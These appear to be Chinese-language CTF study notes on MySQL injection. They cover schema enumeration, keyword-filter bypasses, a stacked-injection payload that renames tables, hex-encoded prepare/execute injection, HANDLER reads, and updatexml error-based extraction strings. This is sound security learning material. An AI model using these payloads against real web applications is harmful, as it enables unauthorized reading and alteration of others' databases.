信息的获取

SELECT

  1. version() 数据库版本
  2. user() 数据库用户名
  3. database 数据库名
  4. @@datadir 数据库路径
  5. @@version_compile_os 操作系统版本

其他

  1. show columns from table_name;列信息
  2. show databases;所有数据库名
  3. show tables;所有表名
  4. 注入 1' order by 2 # 检查记录数量

字符串拼接

  1. concat(str1,str2,…) 能够将你查询的字段连接在一起
  2. concat_ws(separator,str1,str2,) 能够自定义分隔符来将你查询的字段链接在一起
  3. group_concat([DISTINCT] column [Order BY ASC/DESC column] [Separator separator])

Example

SELECT concat(table_name, ' ',column_name) FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = DATABASE();
SELECT group_concat(table_name, column_name separator '_') FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = DATABASE();

关键字被过滤

简单的有:

  1. 大小写混用(seLect,whEre…)
  2. SEL<>ECT(php)
  3. 空格 -> ()
  4. = -> like

但是极其容易被堵,其他方法有以下

alter移花接木(堆叠注入)

alter table (add/change/drop)

select data from words where id = '1';
rename table words
    to words1;
rename table `1919810931114514`
    to words ;
alter table words
	add `id` int auto_increment primary key;
alter table words
    change flag data varchar(100);#';

reference:https://ek1ng.com/notes.html#%E6%80%9D%E8%B7%AF%E4%B8%80

Hex绕开

hex编码sql语句再执行 select * from table_name =>73656c656374202a2066726f6d207461626c655f6e616d65 注入1';SeT@a=0x73656c656374202a2066726f6d207461626c655f6e616d65;prepare execsql from @a;execute execsql;%23

样例set大小写混写绕开

Handler(mysql)

HANDLER tbl_name OPEN [ [AS] alias]
 
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]
 
HANDLER tbl_name CLOSE

以此,有

handler table_name open as `a`; handler `a` read next;

报错注入

updatexml(xml_doument,XPath_string,new_value)

当参数2,即xpath无效时,报错并输出参数2内容

这里用0x7e确保xpath无效

updatexml(1,concat(0x7e,(select(database())),0x7e),1)

updtexml最多显示32的长度,因此再辅以substrleftright

查询有多项返回时用limit

updatexml(1,concat(0x7e,((select(text)from(wfy_comments)limit 11,1)),0x7e),1)

样例中,有11,111代表第12条(11从0计数),1代表从这一条起查询1条,对于报错注入只需要一条

可以用^连接在被注sql语句后

reference: https://ek1ng.com/notes.html#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982019-HardSQL https://cloud.tencent.com/developer/article/1630134 https://vidar-team.feishu.cn/docx/doxcnlBu6zBZWkzfRcX78hv8DNS